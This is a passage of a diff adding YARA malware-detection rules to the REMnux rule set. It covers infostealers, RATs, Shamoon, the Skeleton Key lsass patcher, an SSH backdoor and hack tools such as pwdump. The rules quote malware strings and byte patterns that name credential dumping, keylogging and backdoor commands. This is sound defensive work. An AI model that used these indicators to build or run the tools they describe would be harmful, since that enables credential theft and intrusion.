+			$boot= "BOOTKIT_DLL.dll"
+			$mz = { 4D 5A }
+	condition:
+		$mz in (0..2) and all of ($sink*) and $boot
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Safenet.yar remnux-rules-0.0.4/yara/malware/Safenet.yar
--- remnux-rules-0.0.3/yara/malware/Safenet.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Safenet.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SafeNetCode : SafeNet Family 
+{
+    meta:
+        description = "SafeNet code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-16"
+        
+    strings:
+        // add edi, 14h; cmp edi, 50D0F8h
+        $ = { 83 C7 14 81 FF F8 D0 40 00 }
+    condition:
+        any of them
+}
+
+rule SafeNetStrings : SafeNet Family
+{
+    meta:
+        description = "Strings used by SafeNet"
+        author = "Seth Hardy"
+        last_modified = "2014-07-16"
+        
+    strings:
+        $ = "6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr"
+        $ = "/safe/record.php"
+        $ = "_Rm.bat" wide ascii
+        $ = "try\x0d\x0a\x09\x09\x09\x09  del %s" wide ascii
+        $ = "Ext.org" wide ascii
+        
+    condition:
+        any of them
+
+}
+
+rule SafeNet : Family
+{
+    meta:
+        description = "SafeNet family"
+        
+    condition:
+        SafeNetCode or SafeNetStrings
+        
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Sayad.yar remnux-rules-0.0.4/yara/malware/Sayad.yar
--- remnux-rules-0.0.3/yara/malware/Sayad.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Sayad.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,60 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Vinsula_Sayad_Binder : infostealer
+{
+    meta:
+        Author      = "Vinsula, Inc"
+        Date        = "2014/06/20"
+        Description = "Sayad Infostealer Binder"
+        Reference   = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/"
+
+    strings: 
+        $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Binder\\obj\\Debug\\Binder.pdb" 
+        $delphinativestr = "DelphiNative.dll" nocase
+        $sqlite3str = "sqlite3.dll" nocase
+        $winexecstr = "WinExec" 
+        $sayadconfig = "base.dll" wide
+
+    condition:
+        all of them
+}
+
+rule Vinsula_Sayad_Client : infostealer
+{
+    meta:
+        Author      = "Vinsula, Inc"
+        Date        = "2014/06/20"
+        Description = "Sayad Infostealer Client"
+        Reference   = "http://vinsula.com/2014/07/20/sayad-flying-kitten-infostealer-malware/"
+
+    strings: 
+        $pdbstr = "\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb" 
+        $sayadconfig = "base.dll" wide
+        $sqlite3str = "sqlite3.dll" nocase
+        $debugstr01 = "Config loaded" wide
+        $debugstr02 = "Config parsed" wide
+        $debugstr03 = "storage uploader" wide
+        $debugstr04 = "updater" wide
+        $debugstr05 = "keylogger" wide
+        $debugstr06 = "Screenshot" wide
+        $debugstr07 = "sqlite found & start collectiong data" wide
+        $debugstr08 = "Machine info collected" wide
+        $debugstr09 = "browser ok" wide
+        $debugstr10 = "messenger ok" wide
+        $debugstr11 = "vpn ok" wide
+        $debugstr12 = "ftp client ok" wide
+        $debugstr13 = "ftp server ok" wide
+        $debugstr14 = "rdp ok" wide
+        $debugstr15 = "kerio ok" wide
+        $debugstr16 = "skype ok" wide
+        $debugstr17 = "serialize data ok" wide
+        $debugstr18 = "Keylogged" wide
+
+    condition:
+        all of them
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Scarhikn.yar remnux-rules-0.0.4/yara/malware/Scarhikn.yar
--- remnux-rules-0.0.3/yara/malware/Scarhikn.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Scarhikn.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,57 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ScarhiknStrings : Scarhikn Family
+{
+    meta:
+        description = "Scarhikn Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "9887___skej3sd"
+        $ = "haha123"
+        
+    condition:
+       any of them
+}
+
+
+
+rule ScarhiknCode : Scarhikn Family 
+{
+    meta:
+        description = "Scarhikn code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+    
+    strings:
+        // decryption
+        $ = { 8B 06 8A 8B ?? ?? ?? ?? 30 0C 38 03 C7 55 43 E8 ?? ?? ?? ?? 3B D8 59 72 E7 }
+        $ = { 8B 02 8A 8D ?? ?? ?? ?? 30 0C 30 03 C6 8B FB 83 C9 FF 33 C0 45 F2 AE F7 D1 49 3B E9 72 E2 }
+    
+    condition:
+        any of them
+}
+
+rule Scarhikn : Family
+{
+    meta:
+        description = "Scarhikn"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        ScarhiknCode or ScarhiknStrings
+}
+
+
+
+
+
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Scieron.yar remnux-rules-0.0.4/yara/malware/Scieron.yar
--- remnux-rules-0.0.3/yara/malware/Scieron.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Scieron.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,34 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Scieron
+{
+    meta:
+        author = "Symantec Security Response"
+        ref = "http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012"
+        date = "22.01.15"
+
+    strings:
+        // .text:10002069 66 83 F8 2C                       cmp     ax, ','
+        // .text:1000206D 74 0C                             jz      short loc_1000207B
+        // .text:1000206F 66 83 F8 3B                       cmp     ax, ';'
+        // .text:10002073 74 06                             jz      short loc_1000207B
+        // .text:10002075 66 83 F8 7C                       cmp     ax, '|'
+        // .text:10002079 75 05                             jnz     short loc_10002080
+        $code1 = {66 83 F? 2C 74 0C 66 83 F? 3B 74 06 66 83 F? 7C 75 05}
+        
+        // .text:10001D83 83 F8 09                          cmp     eax, 9          ; switch 10 cases
+        // .text:10001D86 0F 87 DB 00 00 00                 ja      loc_10001E67    ; jumptable 10001D8C default case
+        // .text:10001D8C FF 24 85 55 1F 00+                jmp     ds:off_10001F55[eax*4] ; switch jump
+        $code2 = {83 F? 09 0F 87 ?? 0? 00 00 FF 24}
+        
+        $str1  = "IP_PADDING_DATA" wide ascii
+        $str2  = "PORT_NUM" wide ascii
+        
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/ShadowTech.yar remnux-rules-0.0.4/yara/malware/ShadowTech.yar
--- remnux-rules-0.0.3/yara/malware/ShadowTech.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/ShadowTech.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ShadowTech_2
+{
+    meta:
+        description = "ShadowTech RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /\#(S)trings/
+        $string2 = /\#(G)UID/
+        $string3 = /\#(B)lob/
+        $string4 = /(S)hadowTech Rat\.exe/
+        $string5 = /(S)hadowTech_Rat/
+
+    condition:
+        all of them
+}
+rule ShadowTech
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/ShadowTech"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "ShadowTech" nocase
+		$b = "DownloadContainer"
+		$c = "MySettings"
+		$d = "System.Configuration"
+		$newline = "#-@NewLine@-#" wide
+		$split = "pSIL" wide
+		$key = "ESIL" wide
+
+	condition:
+		4 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Shamoon.yar remnux-rules-0.0.4/yara/malware/Shamoon.yar
--- remnux-rules-0.0.3/yara/malware/Shamoon.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Shamoon.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule CrowdStrike_Shamoon_DroppedFile { 
+	meta:
+		description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
+		reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
+	strings:
+		$testn123 = "test123" wide
+		$testn456 = "test456" wide
+		$testn789 = "test789" wide
+		$testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
+	condition:
+		(any of ($testn*) or $pingcmd) and $testdomain
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Skeleton.yar remnux-rules-0.0.4/yara/malware/Skeleton.yar
--- remnux-rules-0.0.3/yara/malware/Skeleton.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Skeleton.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,49 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule skeleton_key_patcher
+{
+	meta:
+		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		reference = "http://goo.gl/aAk3lN"
+		date = "2015/01/13"
+		score = 70
+	strings:
+		$target_process = "lsass.exe" wide
+		$dll1 = "cryptdll.dll"
+		$dll2 = "samsrv.dll"
+
+		$name = "HookDC.dll"
+
+		$patched1 = "CDLocateCSystem"
+		$patched2 = "SamIRetrievePrimaryCredentials"
+		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
+	condition:
+		all of them
+}
+
+rule skeleton_key_injected_code
+{
+	meta:
+		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
+		author = "Dell SecureWorks Counter Threat Unit"
+		reference = "http://goo.gl/aAk3lN"
+		date = "2015/01/13"
+		score = 70
+	strings:
+		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
+
+		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
+
+		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+		$patch_SamIRetrieveMultiplePrimaryCredential  = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+
+	condition:
+		any of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/sqlite.yar remnux-rules-0.0.4/yara/malware/sqlite.yar
--- remnux-rules-0.0.3/yara/malware/sqlite.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/sqlite.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+rule with_sqlite : sqlite
+{
+	meta:
+		author = "Julian J. Gonzalez <info@seguridadparatodos.es>"
+		reference = "http://www.st2labs.com"
+		description = "Rule to detect the presence of SQLite data in raw image"
+	strings:
+		$hex_string = {53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00}
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/ssh_backdoor.yar remnux-rules-0.0.4/yara/malware/ssh_backdoor.yar
--- remnux-rules-0.0.3/yara/malware/ssh_backdoor.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/ssh_backdoor.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule custom_ssh_backdoor_server {
+	meta:
+		description = "Custome SSH backdoor based on python and paramiko - file server.py"
+		author = "Florian Roth"
+		reference = "https://goo.gl/S46L3o"
+		date = "2015-05-14"
+		hash = "0953b6c2181249b94282ca5736471f85d80d41c9"
+	strings:
+		$s0 = "command= raw_input(\"Enter command: \").strip('n')" fullword ascii
+		$s1 = "print '[-] (Failed to load moduli -- gex will be unsupported.)'" fullword ascii
+		$s2 = "print '[-] Listen/bind/accept failed: ' + str(e)" fullword ascii
+		$s3 = "chan.send(command)" fullword ascii
+		$s4 = "print '[-] SSH negotiation failed.'" fullword ascii
+		$s5 = "except paramiko.SSHException, x:" fullword ascii
+	condition:
+		filesize < 10KB and 5 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Stealer.yar remnux-rules-0.0.4/yara/malware/Stealer.yar
--- remnux-rules-0.0.3/yara/malware/Stealer.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Stealer.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule universal_1337_stealer_serveur : Stealer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="24/02/2013"
+		description="Universal 1337 Stealer Serveur"
+		
+	strings:
+		$signature1={2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A} /*[S-P-L-I-T]*/
+		$signature2={2A 5B 48 2D 45 2D 52 2D 45 5D 2A} /*[H-E-R-E]*/
+		$signature3={46 54 50 7E} /*FTP~*/
+		$signature4={7E 31 7E 31 7E 30 7E 30} /*~1~1~0~0*/
+		
+	condition:
+		$signature1 and $signature2 or $signature3 and $signature4
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Surtr.yar remnux-rules-0.0.4/yara/malware/Surtr.yar
--- remnux-rules-0.0.3/yara/malware/Surtr.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Surtr.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,138 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RSharedStrings : Surtr Family {
+	meta:
+		description = "identifiers for remote and gmremote"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "nView_DiskLoydb" wide
+		$ = "nView_KeyLoydb" wide
+		$ = "nView_skins" wide
+		$ = "UsbLoydb" wide
+		$ = "%sBurn%s" wide
+		$ = "soul" wide
+
+	condition:
+		any of them
+
+}
+
+rule RemoteStrings : Remote Variant Surtr Family {
+	meta:
+		description = "indicators for remote.dll - surtr stage 2"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "\x00Remote.dll\x00"
+		$ = "\x00CGm_PlugBase::"
+		$ = "\x00ServiceMain\x00_K_H_K_UH\x00"
+		$ = "\x00_Remote_\x00" wide
+	condition:
+		any of them
+}
+
+rule GmRemoteStrings : GmRemote Variant Family Surtr {
+	meta:
+		description = "identifiers for gmremote: surtr stage 2"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = "\x00x86_GmRemote.dll\x00"
+		$ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
+		$ = "\x00GmShutPoint\x00"
+		$ = "\x00GmRecvPoint\x00"
+		$ = "\x00GmInitPoint\x00"
+		$ = "\x00GmVerPoint\x00"
+		$ = "\x00GmNumPoint\x00"
+		$ = "_Gt_Remote_" wide
+		$ = "%sBurn\\workdll.tmp" wide
+	
+	condition:
+		any of them
+
+}
+
+
+rule GmRemote : Family Surtr Variant GmRemote {
+	meta:
+		description = "identifier for gmremote"
+		author = "Katie Kleemola"
+		last_updated = "07-25-2014"
+	
+	condition:
+		RSharedStrings and GmRemoteStrings
+}
+
+rule Remote : Family Surtr Variant Remote {
+	meta:
+		description = "identifier for remote"
+		author = "Katie Kleemola"
+		last_updated = "07-25-2014"
+	
+	condition:
+		RSharedStrings and RemoteStrings
+}
+
+rule SurtrStrings : Surtr Family {	
+	meta: 
+		author = "Katie Kleemola"
+		description = "Strings for Surtr"
+		last_updated = "2014-07-16"
+
+	strings:
+		$ = "\x00soul\x00"
+		$ = "\x00InstallDll.dll\x00"
+		$ = "\x00_One.dll\x00"
+		$ = "_Fra.dll"
+		$ = "CrtRunTime.log"
+		$ = "Prod.t"
+		$ = "Proe.t"
+		$ = "Burn\\"
+		$ = "LiveUpdata_Mem\\"
+
+	condition:
+		any of them
+
+}
+
+rule SurtrCode : Surtr Family {
+	meta: 
+		author = "Katie Kleemola"
+		description = "Code features for Surtr Stage1"
+		last_updated = "2014-07-16"
+	
+	strings:
+		//decrypt config
+		$ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
+		//if Burn folder name is not in strings
+		$ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
+		//mov char in _Fire
+		$ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
+
+	condition:
+		any of them
+
+}
+
+rule Surtr : Family {
+	meta:
+		author = "Katie Kleemola"
+		description = "Rule for Surtr Stage One"
+		last_updated = "2014-07-16"
+
+	condition:
+		SurtrStrings or SurtrCode
+
+}
+
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/T5000.yar remnux-rules-0.0.4/yara/malware/T5000.yar
--- remnux-rules-0.0.3/yara/malware/T5000.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/T5000.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule T5000Strings : T5000 Family
+{
+    meta:
+        description = "T5000 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-26"
+        
+    strings:
+        $ = "_tmpR.vbs"
+        $ = "_tmpg.vbs"
+        $ = "Dtl.dat" wide ascii
+        $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
+        $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
+        $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
+        $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
+        $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
+        $ = "A59CF429-D0DD-4207-88A1-04090680F714"
+        $ = "utd_CE31" wide ascii
+        $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
+        $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
+        $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
+        $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
+        
+    condition:
+       any of them
+}
+
+rule T5000 : Family
+{
+    meta:
+        description = "T5000"
+        author = "Seth Hardy"
+        last_modified = "2014-06-26"
+        
+    condition:
+        T5000Strings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/tedroo.yar remnux-rules-0.0.4/yara/malware/tedroo.yar
--- remnux-rules-0.0.3/yara/malware/tedroo.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/tedroo.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,19 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Tedroo : Spammer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="22/11/2015"
+		description="Tedroo Spammer"
+
+	strings:
+		$signature1={25 73 25 73 2E 65 78 65}
+		$signature2={5F 6C 6F 67 2E 74 78 74}
+
+	condition:
+		$signature1 and $signature2
+}
diff -Nru remnux-rules-0.0.3/yara/malware/THOR_HackTools.yar remnux-rules-0.0.4/yara/malware/THOR_HackTools.yar
--- remnux-rules-0.0.3/yara/malware/THOR_HackTools.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/THOR_HackTools.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,3051 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+
+   THOR APT Scanner - Hack Tool Extract
+   This rulset is a subset of all hack tool rules included in our
+   APT Scanner THOR - the full featured APT scanner.
+
+   We will frequently update this file with new rules rated TLP:WHITE
+
+   Florian Roth
+   BSK Consulting GmbH
+   Web: bsk-consulting.de
+
+   revision: 20150510
+
+   License: Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)
+	Copyright and related rights waived via https://creativecommons.org/licenses/by-nc-sa/4.0/
+
+*/
+
+/* WCE */
+
+rule WindowsCredentialEditor
+{
+    meta:
+    	description = "Windows Credential Editor" threat_level = 10 score = 90
+    strings:
+		$a = "extract the TGT session key"
+		$b = "Windows Credentials Editor"
+    condition:
+    	$a or $b
+}
+
+rule Amplia_Security_Tool
+{
+    meta:
+		description = "Amplia Security Tool"
+		score = 60
+		nodeepdive = 1
+    strings:
+		$a = "Amplia Security"
+		$b = "Hernan Ochoa"
+		$c = "getlsasrvaddr.exe"
+		$d = "Cannot get PID of LSASS.EXE"
+		$e = "extract the TGT session key"
+		$f = "PPWDUMP_DATA"
+    condition: 1 of them
+}
+
+/* pwdump/fgdump */
+
+rule PwDump
+{
+	meta:
+		description = "PwDump 6 variant"
+		author = "Marc Stroebel"
+		date = "2014-04-24"
+		score = 70
+	strings:
+		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
+		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
+		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
+	condition:
+		all of them
+}
+
+rule PScan_Portscan_1 {
+	meta:
+		description = "PScan - Port Scanner"
+		author = "F. Roth"
+		score = 50
+	strings:
+		$a = "00050;0F0M0X0a0v0}0"
+		$b = "vwgvwgvP76"
+		$c = "Pr0PhOFyP"
+	condition:
+		all of them
+}
+
+rule HackTool_Samples {
+	meta:
+		description = "Hacktool"
+		score = 50
+	strings:
+		$a = "Unable to uninstall the fgexec service"
+		$b = "Unable to set socket to sniff"
+		$c = "Failed to load SAM functions"
+		$d = "Dump system passwords"
+		$e = "Error opening sam hive or not valid file"
+		$f = "Couldn't find LSASS pid"
+		$g = "samdump.dll"
+		$h = "WPEPRO SEND PACKET"
+		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
+		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
+		$k = "arpspoof\\Debug"
+		$l = "Success: The log has been cleared"
+		$m = "clearlogs [\\\\computername"
+		$n = "DumpUsers 1."
+		$o = "dictionary attack with specified dictionary file"
+		$p = "by Objectif Securite"
+		$q = "objectif-securite"
+		$r = "Cannot query LSA Secret on remote host"
+		$s = "Cannot write to process memory on remote host"
+		$t = "Cannot start PWDumpX service on host"
+		$u = "usage: %s <system hive> <security hive>"
+		$v = "username:domainname:LMhash:NThash"
+		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
+		$x = "Impersonation Tokens Available"
+		$y = "failed to parse pwdump format string"
+		$z = "Dumping password"
+	condition:
+		1 of them
+}
+
+/* Disclosed hack tool set */
+
+rule Fierce2
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the Fierce2 domain scanner"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
+	condition:
+		1 of them
+}
+
+rule Ncrack
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the Ncrack brute force tool"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
+	condition:
+		1 of them
+}
+
+rule SQLMap
+{
+	meta:
+		author = "Florian Roth"
+		description = "This signature detects the SQLMap SQL injection tool"
+		date = "07/2014"
+		score = 60
+	strings:
+		$s1 = "except SqlmapBaseException, ex:"
+	condition:
+		1 of them
+}
+
+rule PortScanner {
+	meta:
+		description = "Auto-generated rule on file PortScanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "b381b9212282c0c650cb4b0323436c63"
+	strings:
+		$s0 = "Scan Ports Every"
+		$s3 = "Scan All Possible Ports!"
+	condition:
+		all of them
+}
+
+rule DomainScanV1_0 {
+	meta:
+		description = "Auto-generated rule on file DomainScanV1_0.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
+	strings:
+		$s0 = "dIJMuX$aO-EV"
+		$s1 = "XELUxP\"-\\"
+		$s2 = "KaR\"U'}-M,."
+		$s3 = "V.)\\ZDxpLSav"
+		$s4 = "Decompress error"
+		$s5 = "Can't load library"
+		$s6 = "Can't load function"
+		$s7 = "com0tl32:.d"
+	condition:
+		all of them
+}
+
+rule MooreR_Port_Scanner {
+	meta:
+		description = "Auto-generated rule on file MooreR Port Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "376304acdd0b0251c8b19fea20bb6f5b"
+	strings:
+		$s0 = "Description|"
+		$s3 = "soft Visual Studio\\VB9yp"
+		$s4 = "adj_fptan?4"
+		$s7 = "DOWS\\SyMem32\\/o"
+	condition:
+		all of them
+}
+
+rule NetBIOS_Name_Scanner {
+	meta:
+		description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "888ba1d391e14c0a9c829f5a1964ca2c"
+	strings:
+		$s0 = "IconEx"
+		$s2 = "soft Visual Stu"
+		$s4 = "NBTScanner!y&"
+	condition:
+		all of them
+}
+
+rule FeliksPack3___Scanners_ipscan {
+	meta:
+		description = "Auto-generated rule on file ipscan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "6c1bcf0b1297689c8c4c12cc70996a75"
+	strings:
+		$s2 = "WCAP;}ECTED"
+		$s4 = "NotSupported"
+		$s6 = "SCAN.VERSION{_"
+	condition:
+		all of them
+}
+
+rule CGISscan_CGIScan {
+	meta:
+		description = "Auto-generated rule on file CGIScan.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "338820e4e8e7c943074d5a5bc832458a"
+	strings:
+		$s1 = "Wang Products" fullword wide
+		$s2 = "WSocketResolveHost: Cannot convert host address '%s'"
+		$s3 = "tcp is the only protocol supported thru socks server"
+	condition:
+		all of ($s*)
+}
+
+rule IP_Stealing_Utilities {
+	meta:
+		description = "Auto-generated rule on file IP Stealing Utilities.exe"
+		author = "yarGen Yara Rule Generator by Florian Roth"
+		hash = "65646e10fb15a2940a37c5ab9f59c7fc"
